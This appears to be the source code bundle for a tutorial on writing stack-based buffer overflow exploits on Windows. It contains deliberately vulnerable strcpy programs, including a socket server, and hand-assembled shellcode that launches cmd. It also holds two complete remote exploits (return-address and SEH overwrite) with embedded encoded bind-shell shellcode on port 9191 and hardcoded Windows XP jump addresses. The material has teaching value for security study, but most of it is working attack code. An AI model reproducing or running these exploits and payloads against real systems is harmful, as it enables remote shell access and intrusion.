Below is the source code that is used in "Writing Stack Based Overflows on Windows". helloworld.cpp ============== #include "stdafx.h" int main(int argc, char* argv[]) { printf("Hello World!\n"); return 0; } basicvuln.cpp ============= // The example has been tested in Visual Studio 6.0 on // Windows XP (no Service Pack, it should work on // windows XP sp2 as well). #include "stdafx.h" #include void main() { char var[10]; strcpy( var, "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH\n" ); printf( var ); } basichacked.cpp =============== // Perl will be used to build the command line argument. //basichacked.cpp #include "stdafx.h" #include "string.h" #include "stdlib.h" //Function copy performs a copy into variable var and exits. int copy(char* input) { char var[20]; strcpy (var, input); return 0; } // Function hacked prints out a string to the console, is not called // anywhere and note it exits using exit function, which exits the // whole program, not just the function hacked. int hacked(void) { printf("Can you see me now ?\n"); exit(0); } int main(int argc, char* argv[]) { // commandline arguments are provided to the executable if(argc < 2) { printf("Usage: %s \r\n", argv[0]); printf("written by Nish[a-t]"); exit(1); } //prints the address of function hacked onto the console. printf("Address of function: 0x%08x\n", hacked); //passes argument 1 to the function copy. copy(argv[1]); return 0; } ============== $arg = "AAAAABBBBBCCCCCDDDDDEEEE"."\x0f\x10\x40"; $cmd = "./basichacked.exe ".$arg; system($cmd); sleep.cpp ========== // sleep.cpp : Defines the entry point for the console application. #include "stdafx.h" #include "Windows.h" //this has been written in visual studio .NET, this can be written in VS 6 as well. void main() { Sleep(99999999); } sleepasm.cpp ============= // sleepasm.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "Windows.h" void main() { __asm { push 99999999 mov eax, 0x77E61BE6 call eax } } cmnd.cpp ======== // cmnd.cpp : Defines the entry point for the console application. // Executes cmd and opens a command prompt. #include "stdafx.h" #include "Windows.h" #include "stdlib.h" void main() { char var[4]; var[0]='c'; var[1]='m'; var[2]='d'; var[3]='\0'; //will cause problems as we can't use 00 to execute. WinExec(var,1); exit(1); } cmdasmdrty.cpp ========= // cmndasmdrty.cpp : Defines the entry point for the console application. // #include "stdafx.h" void main() { __asm { mov byte ptr [ebp-4],63h //var[0]='c' mov byte ptr [ebp-3],6Dh //var[1]='m' mov byte ptr [ebp-2],64h //var[2]='d' mov byte ptr [ebp-1],0 //var[3]='\0' //will cause problems as we can't use 00, it will terminate the // //entire shellcode. //code for WinExec(var, 1); //mov esi,esp, we do not really need this instruction //to execute. push 1 //argument that is being passed to winexec lea eax,[ebp-4] push eax //puting the value onto the stack mov eax, 0x77e684C6 //call dword ptr [__imp__WinExec@8 (0042413c)] call eax //cmp esi,esp we do not really need this instruction to execute. //call __chkesp (00401250) we do not really need this instruction to execute. //code for exit(1); push 1 mov eax, 0x77E75CB5 call eax } } cmndasm.cpp =========== // cmndasm.cpp : Defines the entry point for the console application. #include "stdafx.h" void main() { __asm { mov esp, ebp xor esi,esi push esi mov byte ptr [ebp-4],63h mov byte ptr [ebp-3],6Dh mov byte ptr [ebp-2],64h //mov byte ptr [ebp-1],0 push 1 lea eax,[ebp-4] push eax mov eax, 0x77e684C6 call eax push 1 mov eax, 0x77E75CB5 call eax } } cmndasmxor.cpp ============== // cmndasmxor.cpp : Defines the entry point for the console application. #include "stdafx.h" void main() { __asm { mov esp, ebp xor esi,esi push esi //original cmd\0 // mov byte ptr [ebp-4],63h // mov byte ptr [ebp-3],6Dh // mov byte ptr [ebp-2],64h // mov byte ptr [ebp-1],0 mov ecx, 0x777777ff mov ebx, 0x77131A9C xor ecx, ebx //resulting XOR value (0x00646d63) is stored in ecx. mov [ebp - 4], ecx //the resulting value cmd\0 will be pushed onto the stack. push 1 lea eax,[ebp-4] push eax mov eax, 0x77e684C6 call eax push 1 //push 1 to exit mov eax, 0x77E75CB5 call eax } } server.cpp ========== /* server.cpp : Defines the entry point for the console application. Written in VC 6.0*/ #include "stdafx.h" #include #include #include //load windows socket #pragma comment(lib, "wsock32.lib") //Define Return Messages #define SS_ERROR 1 #define SS_OK 0 void pr( char *str) { char buf[2000]=""; strcpy(buf,str); } void sError(char *str) { MessageBox (NULL, str, "socket Error" ,MB_OK); WSACleanup(); } int main(int argc, char **argv) { if ( argc != 2) { printf("\nUsage: %s \n", argv[0]); return SS_ERROR; } WORD sockVersion; WSADATA wsaData; int rVal; char Message[5000]=""; char buf[2000]=""; u_short LocalPort; LocalPort = atoi(argv[1]); //wsock32 initialized for usage sockVersion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsaData); //create server socket SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0); if(serverSocket == INVALID_SOCKET) { sError("Failed socket()"); return SS_ERROR; } SOCKADDR_IN sin; sin.sin_family = PF_INET; sin.sin_port = htons(LocalPort); sin.sin_addr.s_addr = INADDR_ANY; //bind the socket rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin)); if(rVal == SOCKET_ERROR) { sError("Failed bind()"); WSACleanup(); return SS_ERROR; } //get socket to listen rVal = listen(serverSocket, 10); if(rVal == SOCKET_ERROR) { sError("Failed listen()"); WSACleanup(); return SS_ERROR; } //wait for a client to connect SOCKET clientSocket; clientSocket = accept(serverSocket, NULL, NULL); if(clientSocket == INVALID_SOCKET) { sError("Failed accept()"); WSACleanup(); return SS_ERROR; } int bytesRecv = SOCKET_ERROR; while( bytesRecv == SOCKET_ERROR ) { //receive the data that is being sent by the client max limit to 5000 bytes. bytesRecv = recv( clientSocket, Message, 5000, 0 ); if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) { printf( "\nConnection Closed.\n"); break; } } //Pass the data received to the function pr pr(Message); //close client socket closesocket(clientSocket); //close server socket closesocket(serverSocket); WSACleanup(); return SS_OK; } client.cpp =========== /* client.cpp : Defines the entry point for the console application. Written in VC 6.0*/ create a TCP socket (client socket) create a hostent structure resolve ip address if successful then create another socket with socket_in (essentially server socket) copy the contents of the hostent into new socket */ #include "stdafx.h" #include #include //load windows socket #pragma comment(lib, "wsock32.lib") //Define Return Messages #define CS_ERROR 1 #define CS_OK 0 //Usage Function void usage(char *name) { printf("usage: %s \n\n", name); } //Error Function void sError(char *str) { MessageBox(NULL, str, "Client Error" ,MB_OK); WSACleanup(); } int main(int argc, char **argv) { //Declarations char* serverIP; unsigned short serverPort; WORD version ; version = MAKEWORD(1,1); WSADATA wsaData; if(argc != 4) { usage(argv[0]); return CS_ERROR; } //wsock32 initialized/started up for usage WSAStartup(version,&wsaData); //Create Socket SOCKET clientSocket; clientSocket = socket(AF_INET, SOCK_STREAM, 0); if(clientSocket == INVALID_SOCKET) { sError("Socket error!"); closesocket(clientSocket); WSACleanup(); return CS_ERROR; } struct hostent *srv_ptr; //gethostbyname returns a pointer to hostent( a structure which store information about a host) srv_ptr = gethostbyname(argv[1]); if( srv_ptr == NULL ) { sError("Can't resolve name."); WSACleanup(); return CS_ERROR; } struct sockaddr_in serverSocket; serverIP = inet_ntoa (*(struct in_addr *)*srv_ptr->h_addr_list); serverPort = htons(u_short(atoi(argv[2]))); serverSocket.sin_family = AF_INET; serverSocket.sin_addr.s_addr = inet_addr(serverIP); serverSocket.sin_port = serverPort; //Attempt to connect to remote host if (connect(clientSocket, (struct sockaddr *)&serverSocket, sizeof(serverSocket))) { sError("Connection error."); return CS_ERROR; } // Send data on successful connection, note no limit on argv[3] send(clientSocket, argv[3], strlen(argv[3]), 0); printf("\nMessage Sent\nConnection Closed.\n"); closesocket(clientSocket); WSACleanup(); return CS_OK; } ============== #perl program to crash the server. $arg= "A"x 2000 ."BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"; # EIP = CCCC and EBP = BBBB # note ip address. $cmd = "client.exe 9999 ".$arg; system($cmd); Xploit.cpp ========== /*Xploit.cpp : Defines the entry point for the console application. port listner starts on port 9191 Shell code has been generated from website. create a TCP socket (client socket) create a hostent structure resolve ip address if successful then create another socket with socket_in (essentially server socket) copy the contents of the hostent into new socket */ #include "stdafx.h" #pragma comment(lib, "wsock32.lib") #include #include #include #define NOP 0x90 #define BUFSIZE 3500 #define CS_ERROR 1 #define CS_OK 0 void usage(char *name) { printf("written by Nish Bhalla \nusage: %s \nAfter running the exploit nc -vv 9191\n", name); } void sError(char *str) { MessageBox (NULL, str, "socket Error" ,MB_OK); WSACleanup(); } int main(int argc, char **argv) { /* win32_bind - Encoded Shellcode [\x00] [ EXITFUNC=process LPORT=9191 Size=399 ] shellcode generated from, it encodes \x00*/ unsigned char reverseshell[] = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x12\x56" "\xf1\x86\x83\xeb\xfc\xe2\xf4\xee\xbe\xa7\x86\x12\x56\xa2\xd3\x44" "\x01\x7a\xea\x36\x4e\x7a\xc3\x2e\xdd\xa5\x83\x6a\x57\x1b\x0d\x58" "\x4e\x7a\xdc\x32\x57\x1a\x65\x20\x1f\x7a\xb2\x99\x57\x1f\xb7\xed" "\xaa\xc0\x46\xbe\x6e\x11\xf2\x15\x97\x3e\x8b\x13\x91\x1a\x74\x29" "\x2a\xd5\x92\x67\xb7\x7a\xdc\x36\x57\x1a\xe0\x99\x5a\xba\x0d\x48" "\x4a\xf0\x6d\x99\x52\x7a\x87\xfa\xbd\xf3\xb7\xd2\x09\xaf\xdb\x49" "\x94\xf9\x86\x4c\x3c\xc1\xdf\x76\xdd\xe8\x0d\x49\x5a\x7a\xdd\x0e" "\xdd\xea\x0d\x49\x5e\xa2\xee\x9c\x18\xff\x6a\xed\x80\x78\x41\x93" "\xba\xf1\x87\x12\x56\xa6\xd0\x41\xdf\x14\x6e\x35\x56\xf1\x86\x82" "\x57\xf1\x86\xa4\x4f\xe9\x61\xb6\x4f\x81\x6f\xf7\x1f\x77\xcf\xb6" "\x4c\x81\x41\xb6\xfb\xdf\x6f\xcb\x5f\x04\x2b\xd9\xbb\x0d\xbd\x45" "\x05\xc3\xd9\x21\x64\xf1\xdd\x9f\x1d\xd1\xd7\xed\x81\x78\x59\x9b" "\x95\x7c\xf3\x06\x3c\xf6\xdf\x43\x05\x0e\xb2\x9d\xa9\xa4\x82\x4b" "\xdf\xf5\x08\xf0\xa4\xda\xa1\x46\xa9\xc6\x79\x47\x66\xc0\x46\x42" "\x06\xa1\xd6\x52\x06\xb1\xd6\xed\x03\xdd\x0f\xd5\x67\x2a\xd5\x41" "\x3e\xf3\x86\x31\xb1\x78\x66\x78\x46\xa1\xd1\xed\x03\xd5\xd5\x45" "\xa9\xa4\xae\x41\x02\xa6\x79\x47\x76\x78\x41\x7a\x15\xbc\xc2\x12" "\xdf\x12\x01\xe8\x67\x31\x0b\x6e\x72\x5d\xec\x07\x0f\x02\x2d\x95" "\xac\x72\x6a\x46\x90\xb5\xa2\x02\x12\x97\x41\x56\x72\xcd\x87\x13" "\xdf\x8d\xa2\x5a\xdf\x8d\xa2\x5e\xdf\x8d\xa2\x42\xdb\xb5\xa2\x02" "\x02\xa1\xd7\x43\x07\xb0\xd7\x5b\x07\xa0\xd5\x43\xa9\x84\x86\x7a" "\x24\x0f\x35\x04\xa9\xa4\x82\xed\x86\x78\x60\xed\x23\xf1\xee\xbf" "\x8f\xf4\x48\xed\x03\xf5\x0f\xd1\x3c\x0e\x79\x24\xa9\x22\x79\x67" "\x56\x99\xf8\xca\xb4\x82\x79\x47\x52\xc0\x5d\x41\xa9\x21\x86"; //Declarations //LPHOSTENT serverSocket; char* serverIP; int tout = 20000; int rcount = 0; unsigned short serverPort; char MessageToBeSent[BUFSIZE] = {""}; WORD version ; version = MAKEWORD(1,1); WSADATA wsaData; // jmp ESP for windows xp sp2 //char jmpcode[]="\xED\x1E\x94\x7C"; // address for jmp EDI for windows xp (NO SP) //77EA855E jmp edi char jmpcode[]="\x5E\x85\xEA\x77"; if(argc != 3) { usage(argv[0]); return CS_ERROR; } //wsock32 initialized/started up for usage WSAStartup(version,&wsaData); SOCKET clientSocket; clientSocket = socket(AF_INET, SOCK_STREAM, 0); if(clientSocket == INVALID_SOCKET) { printf("Socket error!\r\n"); closesocket(clientSocket); WSACleanup(); return CS_ERROR; } //gethostbyname returns a pointer to hostent( a structure which store information about a host) struct hostent *srv_ptr; srv_ptr = gethostbyname( argv[1]); if( srv_ptr == NULL ) { printf("Can't resolve name, %s.\n", argv[1]); WSACleanup(); return CS_ERROR; } struct sockaddr_in serverSocket; serverIP = inet_ntoa (*(struct in_addr *)*srv_ptr->h_addr_list); serverPort = htons(u_short(atoi(argv[2]))); serverSocket.sin_family = AF_INET; serverSocket.sin_addr.s_addr = inet_addr(serverIP); serverSocket.sin_port = serverPort; //Attempt to connect to remote host if (connect(clientSocket, (struct sockaddr *)&serverSocket, sizeof(serverSocket))) { printf("\nConnection error.\n"); return CS_ERROR; } memset( MessageToBeSent, NOP, BUFSIZE); memcpy( MessageToBeSent + 1200, reverseshell, sizeof(reverseshell)-1); memcpy( MessageToBeSent + 2004, jmpcode, sizeof(jmpcode)-1); // Send data on successful connection, note no limit on argv[3] send(clientSocket, MessageToBeSent, strlen(MessageToBeSent), 0); printf("\nMessage Sent\n"); char rstring[1024]=""; int bytesRecv = SOCKET_ERROR; //Following while loop, ensures all data has been sent successfully while( bytesRecv == SOCKET_ERROR ) { bytesRecv = recv( clientSocket, rstring, sizeof(rstring), 0 ); if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) { printf( "\nConnection Closed.\n"); break; } } closesocket(clientSocket); WSACleanup(); return CS_OK; } Errorgen.cpp ============ // ErrorGen.cpp : Defines the entry point for the console application. #include "stdafx.h" int main() { int a, b; a= 4 % 2; b= 4 / a; } SEHeXploit.cpp =============== //Exploit for the same server application but the exploit uses the SEH instead of overwriting return code. //SEHeXploit.cpp : Defines the entry point for the console application. //port listner starts on port 9191 //Shell code has been generated from website. #include "stdafx.h" #pragma comment(lib, "wsock32.lib") #include #include #include #define NOP 0x90 #define CS_ERROR 1 #define CS_OK 0 #define BUFSIZE 3500 void usage(char *name) { printf("written by Nish Bhalla \nusage: %s \nAfter running the exploit nc -vv 9191\n", name); } void sError(char *str) { MessageBox (NULL, str, "socket Error" ,MB_OK); WSACleanup(); } int main(int argc, char **argv) { /* win32_bind - Encoded Shellcode [\x00] [ EXITFUNC=process LPORT=9191 Size=399 ] */ unsigned char reverseshell[] = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x12\x56" "\xf1\x86\x83\xeb\xfc\xe2\xf4\xee\xbe\xa7\x86\x12\x56\xa2\xd3\x44" "\x01\x7a\xea\x36\x4e\x7a\xc3\x2e\xdd\xa5\x83\x6a\x57\x1b\x0d\x58" "\x4e\x7a\xdc\x32\x57\x1a\x65\x20\x1f\x7a\xb2\x99\x57\x1f\xb7\xed" "\xaa\xc0\x46\xbe\x6e\x11\xf2\x15\x97\x3e\x8b\x13\x91\x1a\x74\x29" "\x2a\xd5\x92\x67\xb7\x7a\xdc\x36\x57\x1a\xe0\x99\x5a\xba\x0d\x48" "\x4a\xf0\x6d\x99\x52\x7a\x87\xfa\xbd\xf3\xb7\xd2\x09\xaf\xdb\x49" "\x94\xf9\x86\x4c\x3c\xc1\xdf\x76\xdd\xe8\x0d\x49\x5a\x7a\xdd\x0e" "\xdd\xea\x0d\x49\x5e\xa2\xee\x9c\x18\xff\x6a\xed\x80\x78\x41\x93" "\xba\xf1\x87\x12\x56\xa6\xd0\x41\xdf\x14\x6e\x35\x56\xf1\x86\x82" "\x57\xf1\x86\xa4\x4f\xe9\x61\xb6\x4f\x81\x6f\xf7\x1f\x77\xcf\xb6" "\x4c\x81\x41\xb6\xfb\xdf\x6f\xcb\x5f\x04\x2b\xd9\xbb\x0d\xbd\x45" "\x05\xc3\xd9\x21\x64\xf1\xdd\x9f\x1d\xd1\xd7\xed\x81\x78\x59\x9b" "\x95\x7c\xf3\x06\x3c\xf6\xdf\x43\x05\x0e\xb2\x9d\xa9\xa4\x82\x4b" "\xdf\xf5\x08\xf0\xa4\xda\xa1\x46\xa9\xc6\x79\x47\x66\xc0\x46\x42" "\x06\xa1\xd6\x52\x06\xb1\xd6\xed\x03\xdd\x0f\xd5\x67\x2a\xd5\x41" "\x3e\xf3\x86\x31\xb1\x78\x66\x78\x46\xa1\xd1\xed\x03\xd5\xd5\x45" "\xa9\xa4\xae\x41\x02\xa6\x79\x47\x76\x78\x41\x7a\x15\xbc\xc2\x12" "\xdf\x12\x01\xe8\x67\x31\x0b\x6e\x72\x5d\xec\x07\x0f\x02\x2d\x95" "\xac\x72\x6a\x46\x90\xb5\xa2\x02\x12\x97\x41\x56\x72\xcd\x87\x13" "\xdf\x8d\xa2\x5a\xdf\x8d\xa2\x5e\xdf\x8d\xa2\x42\xdb\xb5\xa2\x02" "\x02\xa1\xd7\x43\x07\xb0\xd7\x5b\x07\xa0\xd5\x43\xa9\x84\x86\x7a" "\x24\x0f\x35\x04\xa9\xa4\x82\xed\x86\x78\x60\xed\x23\xf1\xee\xbf" "\x8f\xf4\x48\xed\x03\xf5\x0f\xd1\x3c\x0e\x79\x24\xa9\x22\x79\x67" "\x56\x99\xf8\xca\xb4\x82\x79\x47\x52\xc0\x5d\x41\xa9\x21\x86"; //Declarations char* serverIP; int tout = 20000; int rcount = 0; unsigned short serverPort; char MessageToBeSent[BUFSIZE] = {""}; WORD version ; version = MAKEWORD(1,1); WSADATA wsaData; char jmpcode[]= "\xe7\xc9\xe7\x77\xFB\x7B\xAB\x71\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; /*Breaking the JMP CODE array Down \xe7\xc9\xe7\x77 Address for the error handler routine which returns to the line below \xFB\x7B\xAB\x71 JMP ESP Address for JMP ESP which points to the next line \x89\xE1 mov ecx, esp ESP is 0012E220 \xFE\xCD DEC CH Decrement 8 bit mapping (8-16) bit, Thus ECX would be 0012E120 \xFE\xCD DEC CH Decrement 8 bit mapping (8-16) bit, Thus ECX would be 0012E020 \xFE\xCD DEC CH Decrement 8 bit mapping (8-16) bit, Thus ECX would be 0012DF20 \xFE\xCD DEC CH Decrement 8 bit mapping (8-16) bit, Thus ECX would be 0012DE20 \x89\xCC mov esp, ecx Move the address stored in ECX to ESP. \xFF\xE4"; JMP ESP, which now points to 0x0012DE20 0x0012DE20 is just before our shellcode */ //Functions if(argc != 3) { usage(argv[0]); return CS_ERROR; } WSAStartup(version,&wsaData); SOCKET clientSocket; clientSocket = socket(AF_INET, SOCK_STREAM, 0); if(clientSocket == INVALID_SOCKET) { printf("Socket error!\r\n"); closesocket(clientSocket); WSACleanup(); return CS_ERROR; } // Name resolution and assigning to IP struct hostent *srv_ptr; srv_ptr = gethostbyname( argv[1]); if( srv_ptr == NULL ) { printf("Can't resolve name, %s.\n", argv[1]); WSACleanup(); return CS_ERROR; } struct sockaddr_in serverSocket; serverIP = inet_ntoa (*(struct in_addr *)*srv_ptr->h_addr_list); serverPort = htons(u_short(atoi(argv[2]))); serverSocket.sin_family = AF_INET; serverSocket.sin_addr.s_addr = inet_addr(serverIP); serverSocket.sin_port = serverPort; if (connect(clientSocket, (struct sockaddr *)&serverSocket, sizeof(serverSocket))) { printf("\nConnection error.\n"); return CS_ERROR; } memset( MessageToBeSent, NOP, BUFSIZE); memcpy( MessageToBeSent + 1200, reverseshell, sizeof(reverseshell)-1); memcpy( MessageToBeSent + 2000, jmpcode, sizeof(jmpcode)-1); // Sending send(clientSocket, MessageToBeSent, strlen(MessageToBeSent), 0); printf("\nMessage Sent\n"); char rstring[1024]=""; int bytesRecv = SOCKET_ERROR; while( bytesRecv == SOCKET_ERROR ) { bytesRecv = recv( clientSocket, rstring, sizeof(rstring), 0 ); if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) { printf( "\nConnection Closed.\n"); break; } } closesocket(clientSocket); WSACleanup(); return CS_OK; }